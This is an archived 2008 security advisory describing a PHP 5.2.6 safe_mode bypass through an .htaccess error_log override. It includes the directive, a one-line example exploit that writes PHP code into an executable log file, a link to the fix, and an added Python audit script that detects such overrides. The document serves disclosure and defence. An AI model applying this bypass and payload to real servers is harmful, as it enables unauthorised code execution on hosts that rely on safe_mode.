PHP 5.2.6 error_log safe_mode Bypass Vulnerability

[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.11.2008
- Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.

--- 0. error_log const. bypassed by php_admin_flag ---
The main problem is the difference between enabling safe_mode globally in

php.ini:
safe_mode = On

and declaring it via php_admin_flag

<Directory "/www">
...
        php_admin_flag safe_mode On
</Directory>

When we create a PHP script in /www/ and try to call:

ini_set("error_log", "/hack/");

or put in /www/.htaccess

php_value error_log "/hack/bleh.php"


Result:


Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4


That was the result with safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4

The syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypasses safe_mode.

example exploit:
error_log("<?php phpinfo(); ?>", 0);

--- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not rely on safe_mode as your main security measure.
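
An audit check for the .htaccess override described in section 0, added here as an example (it is not part of the original advisory or of PHP): it lists every php_value error_log directive found in .htaccess files under a document root and marks targets with a script extension. The function names, the extension list and the sample content are assumptions made for illustration.

```python
import re
from pathlib import Path

# Matches: php_value error_log <path>   (path quoted or unquoted).
# Apache directive names are case-insensitive.
DIRECTIVE = re.compile(
    r'^\s*php_value\s+error_log\s+(?:"([^"]*)"|\'([^\']*)\'|(\S+))',
    re.IGNORECASE,
)
# Assumed list of extensions a web server may hand to the PHP interpreter.
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def scan_htaccess_text(text, source="<string>"):
    """Return one finding per error_log override in .htaccess content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)  # commented-out lines never match
        if not m:
            continue
        target = next(g for g in m.groups() if g is not None)
        findings.append({
            "file": source,
            "line": lineno,
            "target": target,
            # A log file the server would execute deserves priority review.
            "script_target": target.lower().endswith(SCRIPT_EXT),
        })
    return findings


def scan_tree(docroot):
    """Walk a document root and scan every .htaccess file under it."""
    findings = []
    for path in Path(docroot).rglob(".htaccess"):
        findings += scan_htaccess_text(path.read_text(errors="replace"), str(path))
    return findings


# Constructed sample, modelled on the directive shown in the advisory.
SAMPLE = '''# constructed .htaccess
Options -Indexes
php_value error_log "/hack/bleh.php"
php_value error_log /var/log/php/site.log
'''

if __name__ == "__main__":
    for finding in scan_htaccess_text(SAMPLE, "/www/.htaccess"):
        print(finding)
```

Setting error_log with php_admin_value in httpd.conf prevents both .htaccess and ini_set() from overriding it, so any finding on such a host points to a directive that is already ignored or to a missing server-level setting.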

--- 3. Greets ---
sp3x Infospec schain p_e_a pi3

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

# milw0rm.com [2008-11-20]




SecurityReason                                                                                                     11/20/2008

				